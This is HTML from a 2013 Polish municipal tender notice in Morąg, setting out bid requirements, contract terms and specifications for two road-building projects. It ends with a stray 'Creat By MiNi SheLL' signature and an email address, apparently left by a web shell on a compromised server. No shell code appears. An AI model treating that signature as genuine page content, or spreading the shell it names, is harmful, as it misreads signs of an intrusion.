<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Oświadczenie o zgodności z warunkami przetargu (Załącznik Nr 7) 2. Zobowiązanie do wniesienia zabezpieczenia (Załącznik Nr 8) 3. Dowód wpłaty wadium 4. Wypełniony i podpisany formularz ofertowy 5. W przypadku wspólnego ubiegania się o udzielenie zamówienia przez kilku wykonawców - wykonawca winien załączyć do oferty pełnomocnictwo podpisane przez wszystkie podmioty wspólnie ubiegające się o udzielenie zamówienia, złożone w formie oryginału lub notarialnie potwierdzonej kopii. 6) W przypadku ustanowienia przez Wykonawcę pełnomocnika, do oferty należy załączyć oryginał udzielonego pełnomocnictwa lub notarialnie potwierdzoną jego kopię. Z treści pełnomocnictwa musi jednoznacznie wynikać zakres umocowania do czynności związanych z postępowaniem o udzielenie zamówienia publicznego, w szczególności do podpisania i złożenia oferty. 7) Wypełnione i podpisane oświadczenie dotyczące realizacji przedmiotu zamówienia z udziałem podwykonawstwa - składają tylko wykonawcy zamierzający przedmiot zamówienia realizować przy udziale podwykonawstwa. (Załącznik nr 9)</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza możliwość dokonania w umowie następujących zmian:
a)	Zmiany kwoty wynagrodzenia:
- w przypadku zmiany albo wprowadzenia nowych przepisów lub norm, jeżeli zgodnie z nimi konieczne będzie dostosowanie treści umowy do aktualnego stanu prawnego, w tym zwłaszcza w zakresie stawki podatku VAT,
-  w przypadku wystąpienia robót uzupełniających, dodatkowych lub zamiennych / koszty tych robót przyjmowane będą na podstawie kosztorysów sporządzonych wg ustalonych składników cenotwórczych zawartych w formularzu ofertowym Wykonawcy/,
- w przypadku wykonania mniejszego zakresu robót niż określony w dokumentacji technicznej proporcjonalnie do zakresu rzeczowego.
b)	Zmiany terminu wykonania przedmiotu zamówienia:
- w przypadku zlecenia wykonania robót dodatkowych lub zamiennych jeżeli terminy ich zlecenia, rodzaj lub zakres, uniemożliwiają dotrzymanie pierwotnego terminu umownego,
- w przypadku wystąpienia anomalii pogodowych lub innych nieprzewidywalnych przyczyno charakterze obiektywnym, mających znaczny wpływ na termin wykonania,
- w związku ze stwierdzeniem braków lub błędów projektowych o czas niezbędny na poprawienie lub uzupełnienie projektu,
- w przypadku udzielenia zamówień uzupełniających przewidzianych w SIWZ pkt 4.1 jeżeli terminy ich zlecenia uniemożliwiają dotrzymanie pierwotnego terminu umownego,
Okres wydłużenia terminu zakończenia powinien odpowiadać okresom opóźnień wymienionych powyżej.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.morag.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Morągu, ul. 11 Listopada 9, 14-300 Morąg pokój nr 15..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 07.03.2013 godzina 09:00, miejsce: Urząd Miejski w Morągu, ul. 11 Listopada 9, 14-300 Morąg pokój nr 30..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Budowa ulicy Mazurskiej w Morągu.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem inwestycji jest budowa ulicy (beton asfaltowy) i chodników z kostki betonowej oraz oświetlenia ulicznego.
Parametry nawierzchni:

- Podłoże G-2
- Szerokość drogi 5,5m
- Szerokość chodników 1,5 i 2,0 m
- Szerokość poboczy 1,5m
Konstrukcja nawierzchni drogi i chodnika

Droga:
- Warstwa ścieralna z betonu asfaltowego o strukturze zamkniętej 
- Skropienie emulsją asfaltową 
- Warstwa wiążąca z betonu asfaltowej o strukturze częściowo zamkniętej 
- Skropienie emulsją asfaltową 
- Górna warstwa podbudowy 
- Dolna warstwa podbudowy - Warstwa odsączająca z piasku 

Na odcinku A-C km 0+000 ÷ 0+058 oraz D-G km 0+057 ÷ 0+118.78
- Warstwa ścieralna z betonu asfaltowego o strukturze zamkniętej 
- Skropienie emulsją asfaltową 
- Warstwa wiążąca z betonu asfaltowej o strukturze częściowo zamkniętej 
- Skropienie emulsją asfaltową 
- Górna warstwa podbudowy 
- Dolna warstwa podbudowy 
- Warstwa odsączająca z piasku 
- Geokrata o małych komórkach 
- Geowłóknina 
Chodnik 

- Kostka betonowa 6 cm na warstwie wyrównawczej 
- Warstwa odsączająca z piasku 

Zjazdy
- Kostka betonowa 8 cm w kolorze czerwonym 
- Podbudowa z tłucznia kamiennego 
- Warstwa odsączająca z piasku 

Skrzyżowanie z drogą żwirową 

Na początku przebiegu projektowanej drogi po prawej stronie występuje skrzyżowanie
z drogą o nawierzchni żwirowej. Na odcinku 15 m wykonać nawierzchnię z tłucznia
kamiennego. Obramowanie wykonać z krawężnika na ławie betonowej z oporem

Odwodnienie
Właściwe odwodnienie powierzchniowe mają zapewnić spadki podłużne i poprzeczne.
Dalszy bieg wód opadowych przejmą kratki ściekowe na studniach fi 500 z osadnikiem
połączone do istniejącej sieci kanalizacji deszczowej . Odcinek A-C jest uzbrojony w sieć
kanalizacji deszczowej i odprowadzenie wód z kratek należy wykonać za pomocą
przykanalików fi 200 do istniejących studni .
Na odcinku D-G (km 0+000 - 0+076) wody z kratek ściekowych odbierze istniejąca
kanalizacja deszczowa. Pozostały odcinek ( km 0+076 - 0+117) o powierzchni 0,05ha będzie
odwodniony za pomocą kolektora fi200 do osadnika i dalej do rowu.
W wycenie oferty należy oczywiście uwzględnić separator (opisany w dok. technicznej).

Zabezpieczenie wlotu przepustu rzeki Morążek

Na skrzyżowaniu z ulicą Mazurską występuje przepust fi1000 o rzędnej dna 111,61 n.p.m.
Wykonać zabezpieczenie głębokiego wykopu barierą ochronną stalową w kolorze żółtym z
rur fi100 i fi80 osadzonych w fundamencie żelbetowym.

Oznakowanie

Oznakowanie wykonać zgodnie z planem oznakowania ustawiając znaki na słupkach z rur
stalowych ocynkowanych fi 63mm stabilizowanych betonem w gruncie. Wysokość spodu znaku 2m ponad poziomem chodnika.

Oświetlenie uliczne

Wszystkie latarnie posadowione będą przy obrzeżu chodnika na gruntach będących we władaniu gminy Morąg.
Zasilanie zaprojektowanych obwodów oświetleniowych budowanej ulicy zaprojektowano z istniejącej szafki sterowniczej SO typu SOP-n-3 w obudowie OP 58D.
Budowę obwodów oświetleniowych nr I do III wykonać kablem ziemnym YAKY4x25,0m2 wyprowadzonym z szafki sterowniczej SO w kierunku budowanej ulicy Mazurskiej. W miejscach wskazanych w projekcie ustawić aluminiowe słupy oświetleniowe 6m montowane na prefabrykowanych fundamentach.


Szczegółowy zakres przedmiotu zamówienia opisuje dokumentacja projektowa, przedmiary robót, specyfikacja techniczna wykonania i odbioru robót budowlanych.
Zamawiający dopuszcza ujęcie w ofercie,  a następnie zastosowanie innych materiałów i urządzeń niż podane w dokumentacji projektowej i przedmiarze pod warunkiem zapewnienia parametrów nie gorszych niż określone w tej dokumentacji. W takiej sytuacji Zamawiający wymaga złożenia stosownych dokumentów, uwiarygodniających te materiały i urządzenia. Złożone wyżej wskazane dokumenty będą podlegały ocenie przez autora dokumentacji projektowej, który sporządzi stosowną opinie. Opinia ta będzie podstawą do podjęcia przez Zamawiającego decyzji o akceptacji równoważników lub odrzuceniu oferty z powodu ich nierówno ważności.
Ze względu na ograniczoną ilość środków finansowych w bieżącym roku, Zamawiający dokona płatności w roku 2013 maksymalnie na kwotę 97 000,00 zł brutto. Pozostała kwota ceny ofertowej Wykonawcy zostanie opłacona w roku 2014..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.20.00.00-9, 45.23.16.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2014.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Budowa drogi we wsi Strużyna.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem inwestycji jest wykonaniu nawierzchni drogi z masy bitumicznej na podbudowie z kamienia łamanego oraz wykonanie nowej nawierzchni na zjazdach oraz odwodnienia drogi.

Parametry projektowe

-Klasa drogi D
- Podłoże G-1
- Szerokość nawierzchni 4,0m
- Szerokość poboczy 0,5m

Zjazdy na posesje

Wszystkie istniejące zjazdy na sąsiednie posesje i na drogi zostaną utwardzone do granicy działki zachowując nawierzchnię taką samą jak nawierzchnia drogi.

Szerokość zjazdów 3,5m.
Długość do granic działek.
Spadek podłużny max. 5%.
Zjazdy obramować krawężnikiem betonowym chowanym , na ławie betonowej z betonu B15 z oporem .

Konstrukcja nawierzchni drogi i zjazdów
- Warstwa ścieralna z betonu asfaltowego o strukturze zamkniętej 
- Skropienie asfaltem D-200 
- Warstwa wiążąca z betonu asfaltowego o strukturze częściowo zamkniętej 
- Skropienie asfaltem D-200 
- Warstwa warstwa klinująca z betonu asfaltowego o strukturze częściowo
zamkniętej 
- Skropienie asfaltem D-200 w ilości 1kg/m2 podbudowy z kamienia łamanego
- Górna warstwa podbudowy 
- Dolna warstwa podbudowy 
- Warstwa odsączająca z piasku 

Roboty rozbiórkowe

Przed rozpoczęciem robót nawierzchniowych należy rozebrać istniejącą nawierzchnię
brukowcową znajdującą się pod projektowanymi powierzchniami, wywożąc materiał w miejsce wskazane przez inwestora.

Odwodnienie

Właściwe odwodnienie powierzchniowe mają zapewnić spadki podłużne i poprzeczne.
Dalszy bieg wód opadowych przejmą urządzenia odwadniające. Do odwodnienia w miejscach spływu wód zastosowano kratki ściekowe
na studniach fi 500 z odstojnikiem min. 0,5m głębokości z odprowadzeniem przykanalikiem fi 200.
Do odbioru wody zastosowano ściek betonowy 50x60x15 na podbudowie z chudego betonu.

Oznakowanie
Znak pionowy A-7 wykonać zgodnie z planem sytuacyjnym , mocując na słupie stalowym ocynkowanych na wysokości 2m ponad poziom drogi.

Szczegółowy zakres przedmiotu zamówienia opisuje dokumentacja projektowa, przedmiary robót, specyfikacja techniczna wykonania i odbioru robót budowlanych.
Zamawiający dopuszcza ujęcie w ofercie,  a następnie zastosowanie innych materiałów i urządzeń niż podane w dokumentacji projektowej i przedmiarze pod warunkiem zapewnienia parametrów nie gorszych niż określone w tej dokumentacji. W takiej sytuacji Zamawiający wymaga złożenia stosownych dokumentów, uwiarygodniających te materiały  i urządzenia. Złożone wyżej wskazane dokumenty będą podlegały ocenie przez autora dokumentacji projektowej, który sporządzi stosowną opinie. Opinia ta będzie podstawą do podjęcia przez Zamawiającego decyzji o akceptacji równoważników lub odrzuceniu oferty z powodu ich nierówno ważności.
Ze względu na ograniczoną ilość środków finansowych w bieżącym roku, Zamawiający dokona płatności w roku 2013 maksymalnie na kwotę 97 000,00 zł brutto. Pozostała kwota ceny ofertowej Wykonawcy zostanie opłacona w roku 2014..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.24-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2014.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com